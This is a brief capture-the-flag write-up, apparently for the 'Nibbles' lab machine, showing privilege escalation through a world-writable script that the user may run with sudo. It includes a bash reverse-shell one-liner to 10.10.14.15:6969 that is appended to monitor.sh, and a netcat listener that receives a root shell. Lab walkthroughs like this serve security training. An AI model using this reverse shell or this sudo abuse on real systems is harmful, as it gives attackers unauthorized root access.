4 privesc

$ unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh
  
$ tree
.
└── stuff
    └── monitor.sh
	
sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
	
ls -la
total 16
drwxr-xr-x 2 nibbler nibbler 4096 May  4 17:40 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4095 May  4 17:39 monitor.sh


We can write to it, easy reverse shell
echo "bash -c 'bash -i >& /dev/tcp/10.10.14.15/6969 0>&1'" >> monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.75] 36550
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Last updated